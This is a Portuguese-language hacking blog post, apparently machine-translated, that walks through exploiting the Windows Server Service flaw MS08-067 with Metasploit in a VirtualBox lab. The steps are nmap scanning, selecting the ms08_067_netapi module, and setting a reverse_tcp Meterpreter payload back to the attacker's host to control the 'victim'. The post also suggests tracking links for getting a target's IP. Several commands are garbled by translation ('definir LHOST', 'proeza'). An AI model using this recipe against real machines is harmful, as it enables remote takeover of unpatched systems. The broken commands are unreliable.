terça-feira, 15 de janeiro de 2013

[Metasploit Tutorial] Hacking Windows XP usando o endereço IP

Você acha que é possível cortar algum computador com um apenas um endereço de ip?! A resposta é sim, se você está usando sem correções (vulnerável) OS. Se você não acredita em mim, então leia o artigo completo.

Neste artigo eu estou indo para demonstrar como hackear um computador remoto, explorando a falha de análise no código canonização caminho da Netapi32.dll através do Serviço de Servidor ( CVE-2008-4250 ). Antes de saltar para o processo de exploração real, deixe-me dar mais detalhes sobre esta vulnerabilidade no serviço de Servidor.

Detalhes sobre Vulnerabilidade Server Service (MS08-067):
Serviço Microsoft Windows Server fornece suporte para compartilhamento de recursos, como arquivos e serviços de impressão através da rede.

O serviço do servidor é vulnerável a uma vulnerabilidade de execução de código remoto. A vulnerabilidade é causada devido a um erro no processamento de sequências quando netapi32.dll diretório caráter de travessia em nomes de caminho. Isto pode ser explorado para corromper a memória pilha por exemplo o envio de solicitações RPC contendo nomes de caminho especialmente criadas para o componente de serviço do servidor. O 'NetprPathCanonicalize ()' função no arquivo 'netapi32.dll' é afetado.

Um pedido malicioso para os resultados sistema vulnerável compromisso completa de computadores vulneráveis.
Essa vulnerabilidade afeta o Windows XP, Windows 2000, Windows Server 2003, Windows Vista e Windows Server 2008. Mas Atacantes requerem acesso autenticado no Windows Vista e Server 2008 plataformas para explorar esta questão.

Explorando o MS08-067 usando Metasploit:

Requisitos:
  • VirtualBox
  • Backtrack 5
  • Alvo OS (XP)
Etapa 1:

Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs.

Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox .

Passo 2: Encontrar o endereço IP de destino
Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.

Hackers usam métodos diferentes para encontrar o endereço IP da vítima. Para por exemplo., Enviando link que irá obter os detalhes ip ou usar o Angry IP Scanner.

Passo 3: Coleta de Informações
Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap.

Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.


Passo 4: Metasploit
Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole".

O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework.

Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.


Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi".

Passo 5: Carga Set
Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole.

Passo 6: Opções
Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal.

Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.

Passo 7: Explorando
Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.

Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86